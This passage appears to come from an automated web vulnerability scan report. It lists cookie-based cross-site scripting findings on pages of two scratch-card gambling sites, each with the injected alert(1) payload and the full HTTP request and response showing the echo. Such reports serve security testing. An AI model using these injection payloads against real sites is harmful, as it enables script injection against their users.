Cookie: ARC=13013735b5a'%3balert(1)//6459e002c93; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21949
Content-Type: text/html
Set-Cookie: ARC=13013735b5a%27%3Balert%281%29%2F%2F6459e002c93; expires=Tue, 15-May-2012 12:34:46 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013735b5a';alert(1)//6459e002c93&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.366. http://www.primescratchcards.com/promotions.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/promotions.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload b3df5--><script>alert(1)</script>56754053710 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137b3df5--><script>alert(1)</script>56754053710; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21997
Content-Type: text/html
Set-Cookie: ARC=130137b3df5%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E56754053710; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137b3df5--><script>alert(1)</script>56754053710">
...[SNIP]...

3.367. http://www.primescratchcards.com/promotions.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/promotions.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33310"%3balert(1)//3d9ccf14ce8 was submitted in the ARC cookie. This input was echoed as 33310";alert(1)//3d9ccf14ce8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013733310"%3balert(1)//3d9ccf14ce8; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22051
Content-Type: text/html
Set-Cookie: ARC=13013733310%22%3Balert%281%29%2F%2F3d9ccf14ce8; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013733310";alert(1)//3d9ccf14ce8' border='0' width='1' height='1'>
...[SNIP]...

3.368. http://www.primescratchcards.com/terms.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60ce4"%3balert(1)//42e489c06ee was submitted in the ARC cookie. This input was echoed as 60ce4";alert(1)//42e489c06ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013760ce4"%3balert(1)//42e489c06ee; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57467
Content-Type: text/html
Set-Cookie: ARC=13013760ce4%22%3Balert%281%29%2F%2F42e489c06ee; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013760ce4";alert(1)//42e489c06ee' border='0' width='1' height='1'>
...[SNIP]...

3.369. http://www.primescratchcards.com/terms.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/terms.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93635'%3balert(1)//e5ec88b1b5a was submitted in the ARC cookie. This input was echoed as 93635';alert(1)//e5ec88b1b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013793635'%3balert(1)//e5ec88b1b5a; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57467
Content-Type: text/html
Set-Cookie: ARC=13013793635%27%3Balert%281%29%2F%2Fe5ec88b1b5a; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=13013793635';alert(1)//e5ec88b1b5a&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.370. http://www.primescratchcards.com/terms.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/terms.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload ea9da--><script>alert(1)</script>a9a4a88d1aa was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ea9da--><script>alert(1)</script>a9a4a88d1aa; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57515
Content-Type: text/html
Set-Cookie: ARC=130137ea9da%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea9a4a88d1aa; expires=Tue, 15-May-2012 12:35:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137ea9da--><script>alert(1)</script>a9a4a88d1aa">
...[SNIP]...

3.371. http://www.primescratchcards.com/underage.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcba7'%3balert(1)//71b7a400578 was submitted in the ARC cookie. This input was echoed as bcba7';alert(1)//71b7a400578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137bcba7'%3balert(1)//71b7a400578; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20446
Content-Type: text/html
Set-Cookie: ARC=130137bcba7%27%3Balert%281%29%2F%2F71b7a400578; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=USD&AR=130137bcba7';alert(1)//71b7a400578&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.372. http://www.primescratchcards.com/underage.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/underage.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload f7ff5--><script>alert(1)</script>bd18fc8ec55 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f7ff5--><script>alert(1)</script>bd18fc8ec55; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20494
Content-Type: text/html
Set-Cookie: ARC=130137f7ff5%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebd18fc8ec55; expires=Tue, 15-May-2012 12:35:08 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137f7ff5--><script>alert(1)</script>bd18fc8ec55">
...[SNIP]...

3.373. http://www.primescratchcards.com/underage.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba420"%3balert(1)//0165cf47649 was submitted in the ARC cookie. This input was echoed as ba420";alert(1)//0165cf47649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137ba420"%3balert(1)//0165cf47649; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20446
Content-Type: text/html
Set-Cookie: ARC=130137ba420%22%3Balert%281%29%2F%2F0165cf47649; expires=Tue, 15-May-2012 12:35:06 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=130137ba420";alert(1)//0165cf47649' border='0' width='1' height='1'>
...[SNIP]...

3.374. http://www.scratch2cash.com/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7dca"-alert(1)-"951fde2eaf5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
Referer: http://www.scratch2cash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMf7dca"-alert(1)-"951fde2eaf5; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1546523937.1305546138.1305546138.1305546138.1; __utmc=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: BO=FMf7dca"-alert(1)-"951fde2eaf5; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 44002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf7dca"-alert(1)-"951fde2eaf5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.375. http://www.scratch2cash.com/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe5d"-alert(1)-"c88e84d4dce was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
Referer: http://www.scratch2cash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMafe5d"-alert(1)-"c88e84d4dce; BO=FM; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1546523937.1305546138.1305546138.1305546138.1; __utmc=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:46:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMafe5d"-alert(1)-"c88e84d4dce; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 44002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMafe5d"-alert(1)-"c88e84d4dce";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.376. http://www.scratch2cash.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a06c"-alert(1)-"520d6f030bd was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM1a06c"-alert(1)-"520d6f030bd; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: BO=FM1a06c"-alert(1)-"520d6f030bd; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM1a06c"-alert(1)-"520d6f030bd";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.377. http://www.scratch2cash.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/AboutUs.aspx

Issue detail

